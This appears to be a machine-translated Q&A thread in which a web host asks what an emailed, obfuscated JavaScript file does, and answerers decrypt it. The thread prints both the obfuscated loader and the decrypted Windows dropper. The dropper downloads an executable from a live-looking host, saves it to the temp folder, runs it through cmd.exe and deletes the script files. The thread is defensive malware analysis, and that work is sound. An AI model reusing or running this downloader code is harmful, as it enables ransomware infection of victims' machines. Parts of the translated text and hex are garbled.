下面的代码段是做什么的?(JavaScript)
所以有一些背景。我目前为我的客户托管了一些小型网站。我用cPanel 最近,我在服务器上收到一封带有zip文件的电子邮件。zip文件包含以下代码:下面的代码段是做什么的?(JavaScript),javascript,Javascript,所以有一些背景。我目前为我的客户托管了一些小型网站。我用cPanel 最近,我在服务器上收到一封带有zip文件的电子邮件。zip文件包含以下代码: 函数jqmqmkrehl(luezhqtygz) { 返回parseInt(luezhqtygz,16); } 函数jvqissrxgt() { var ftytqpuqjd=“val12312312”.match(/\S{1}/g); 返回ftytqpuqjd[Math[“floo”+“”+“r”](Math.random()*ftytqpuqj
函数jqmqmkrehl(luezhqtygz)
{
返回parseInt(luezhqtygz,16);
}
函数jvqissrxgt()
{
var ftytqpuqjd=“val12312312”.match(/\S{1}/g);
返回ftytqpuqjd[Math[“floo”+“”+“r”](Math.random()*ftytqpuqjd.length)];
}
函数jqmqmkrehl(luezhqtygz)
{
返回parseInt(luezhqtygz,16);
}
函数sehudashf()
{
var a=1;
var lzpxyboxat=“F0F70CA69F56833161C510CEBD2E316A4AD4D831569405B7E3F00EE9CB5C8D14505408FCFDAB19B19946970E5D4449E7FBEE2AB19F4FCC451C580CE8B6C301B182498920735403FAF5F64AE7A66CB4357047C7DBCE2A91BF6FCE51074E04F3DEF616B5”+
“C5509C1D521E4BD8D3D640E9CB4A9E1410160FFEFAFF107ECD047811474421DEFB8F107AB8F17C54355049B7EEEF0E8D9F4B9C564F4208EBE3F142F8D61DE480C1F49E4E4E716B09951CB1B5A05FDF7E1095280304842219B1C4E711B584519F1D”+
“7E590DE6BAA204A4874C8951074B0CF3E5E719B78E4B990A52160AFEFEE00A48854C416495A05B3B6F610B08E16D705415508EBF5EA42ED8E4D9E174E1F12EDF3F617B7851F8F19505A0BFEF5E94AAB9E5380541C421BEF359B8999916F4200F0”+
“F8A205A09F7B8D0C5D1E0AFEFAE00A48854C503484410E4F1E716818A4B8D3E5E5904AE4EE4AE7834B9808061946FDF9E006AA86558819124206EFB9E306A88251C085444656F9AB04CA28259CE541C501CF1F5F60BA85179E1D4F4305EBBAA207B7”+
“99509E511C4D00F9B6AA43A0994D830A154D1BFAE2F710ABCB5C8D14505408FCFDAA10A0984A800C10160FFEFAF107ECD04289144F5312F8F3F626A49F5EAA0A535B3CEDFAA40AD9F4B9C4213190BF0F4E60DA8815B8D56485919B07E60FAC85119C10”+
“4C090FA2A4 AC05AC8D1DC0585A4307FCE2EB0DABC34D890B495A1DB3B6E710B7844DC558475F0FBEA307B799509E5147440CEBE3F00CE58855E80145E570AF4BE3F00CE588541C5008F3E5E74BFE965A800B594D0EFAE2C03B18A799E17531BF3之前”+
“BEA00AB19F4FD657135406FDF2ED0FAF8F5EC20C534646FEF2EF0BABC54F8408035044ADB8E50BA3C913CC1E49580AEBFFED0CED995A9F0D504245BFF3F010AA9916CC03555049B7E710B7844DC5034E531DEAE 4EC42A68A53801A5D5502B7E47E711B0”+
“874BC058A5705ECF3AB59B88E539F1D47440CEBE3F00CE5885E80145E570AF4BEEC17A98713CC0C4E430CB6ADFF1FECD042951074B14B6ADFF01A49F5C845814531BED9F04BE995A980D4E5849FCF7EE78A5C875052430F3BAA216B79E5AC543”+
“414B0FEAF8E116AC8451CC1F59423DFAFBF224AC875ABC19485E41B6EDF610BC90498D0A1C501ABFABA20CA09C1FAD1B485F1FFACD00AF8E5C98501E650AEDFF216AC8558C23E555A0CCEFF116A086708E1259551DBFB914A4991F98154C7000F3”+
“F3CC03A88E1FD1581E6A35BDB6A942888A4B84564E5707FBF9EF4AECC54B832B484400F1AA51F3C2119F0D5E451DEDBB04EE5D216CC531C1447FAEEE740FE9D5E9E58E584B845801160FECB8C507B18491B55705D9F9EE06A0”+
“9917DE511C1D49EBFBF224AC875AA219515352EDF3F617B7851F98154C7000F3F3D203B18304911B5D420AF7B6AA07B799509E5147440CEBE3F00CE58D5E800B590D14E2F0F70CA69F56833161C4508E9F3D60D918E529C5058571DFEBAA201A487538E19”+
“5F5D40E4E2F01BFE9E5E9E584C571DF7B6BF42A2828E4B81D51462F6FAE732A49F57C451075F0FBEF203B18316970E5D4449F0F4E831B1995A8D151C0B49F1F3428B850E596FDFCE701B1C31AD3C73722BFB1C5610A08A52CE5107590BF5”+
“C5F610A08A52C2374C5307BFB90DA7816C980A595704B12A0CB02CC4907590BF5C5F610A08A52C22F4E5F1DFABEE603B18A16D7175E5C3AEBE4E703A8C56F830B55420F0F8A25FE5DB04831A56651EDF30FEBB85E9A1D68592F6FAE74AB5”+
“8A4B84541C0440A4F9E008969F4D891951182AF3F9F107EDC2049E1D48431BF1B6E103A9875D8D1B5711EE5E800B591F52E2F3EE11A0CB449E1D48431BF1B6E103A9875D8D1B57E07EAFAEE59F4D991D150D14F5711A6831FC41D”+
“4E4406EDBFF910A09F4A9E161C5508F3FAE003A68017820D505A45BFE2F017A0C20491055B531DDBF7F603ED8D4A821B485F06F1B6A049F5EC05859441BF0E4AB42BE8259CC501D531BED9F04BBE985E9A1D68593DFAFBF24AA18A4B8D541C501CF1”+
“F5F60BAA851FC40855D4201B3B6E710B7844DC558475F0FBEA307B799509E5147421BEDF403B7CB489F101C0B49F1F3F54284844B850E596FDFCE701B1C31DBB5F4400EFE2AC31AD8E53805A150D1EECFEAC30B08517CE1B515247FAEE742EA”+
“881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52”;
返回lzpxyboxat;
}
函数YNEPEAQZWU(YLUYZUVPS)
{
var mfjvremiuf;
while(true){
尝试
{
mfjvremiuf=(新函数(“uneuuflaii”,“var zkyczguxoo=new Array(150130,98197235,63236120,60,54105159),htcpxtvter=uneuuflaii.match(/\\S{2}/g),xjrefvhonb=\“\”,ftvjsrrtfs=0;对于(var ftvjsrrtfs=0,wgwizghjb=0;ftvjsrrtfs=zkyczkyczguxoo.length){wgwizghjb=0;^xjrefvhonb+=String.fromcpvjvjsrzgwgzgjjjwgjjjjjvvvjsjjjwwwgjjjjwwwwjjjjjjjjjjwjjjjjjjjjjjjjwwwwjjjjj+jvqissrxgt()+jvqissrxgt()+jvqissrxgt()+“(xjrefvhonb);”)(yluyzuvvps));
打破
}
捕获(er)
{
}
}
返回mfjvremiuf;
}
yneepaqzwu(sehudashf())它的作用如下:代码解密长字符串变量(var lzpxyboxat=“f0f70ca69f568361c510c…
)。解密的字符串再次是JavaScript代码,然后执行。这是解密的代码:
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function (data, error) {
if (!error) {
saveToTemp(data, function (path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run("cmd.exe /c start " + path + " & del *.js");
} catch (error) {
}
}
});
}
});
此代码从URL下载文件(警告:可能存在恶意文件)http://bobdomjda.top/admin.php?f=2.gif
。该文件保存在临时文件文件夹中,并使用cmd.exe/c start[filename]
执行
据我所知,下载和执行将只在Windows系统上工作
我已将文件上载到VirusTotal:。使用脚本会产生:
var encrypted =
"f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
"c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
"7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
"f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
"99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
"4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
"bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
"874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
"414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
"f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
"9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
"5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
"c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
"8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
"4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
"f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
"881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";
function decrypt(encrypted) {
var key = new Array(150, 130, 98, 197, 235, 63, 236, 120, 60, 54, 105, 159),
bytes = encoded.match(/\S{2}/g),
code = "";
for (var i = 0, j = 0; i < bytes.length; i++, j++) {
if (j >= key.length) {
j = 0;
}
code += String.fromCharCode(parseInt(bytes[i], 16) ^ key[j]);
}
return code;
}
// eval(decrypt(encrypted)); // commented out to prevent accidental execution
这个剧本
从http://bobdomjda.top/admin.php?f=2.gif
使用ActiveX(“Scripting.FileSystemObject”、“ADODB.Stream”)将其保存在本地文件系统中,例如“owynovqn2.exe”
使用ActiveX(“WScript.Shell”)执行它
据统计,61个病毒扫描程序中有8个将可执行文件识别为恶意文件,例如McAfee将其分类为“Behavelike.Win32.Ransom.dc”。它被混淆了。它被设计为难以理解。不要使用它。正确地学习JS。”最近,我在服务器上收到一封带有zip文件的电子邮件。“-可能是恶意的。把它扔进垃圾桶就行了。OP对一段潜在的恶意JS代码和
function getDataFromUrl(url, callback) {
try{
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl(
"http://bobdomjda.top/admin.php?f=2.gif",
function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl(
"http://bobdomjda.top/admin.php?f=2.gif",
function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl(
"http://bobdomjda.top/admin.php?f=2.gif",
function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
}
);
}
}
);
}
}
);
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(
function (data, error) {
if (!error) {
saveToTemp(
data,
function (path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
// wsh.Run("cmd.exe /c start "+path+" & del *.js"); // Commented out to prevent accidental execution
} catch (error) {}
}
}
);
}
}
);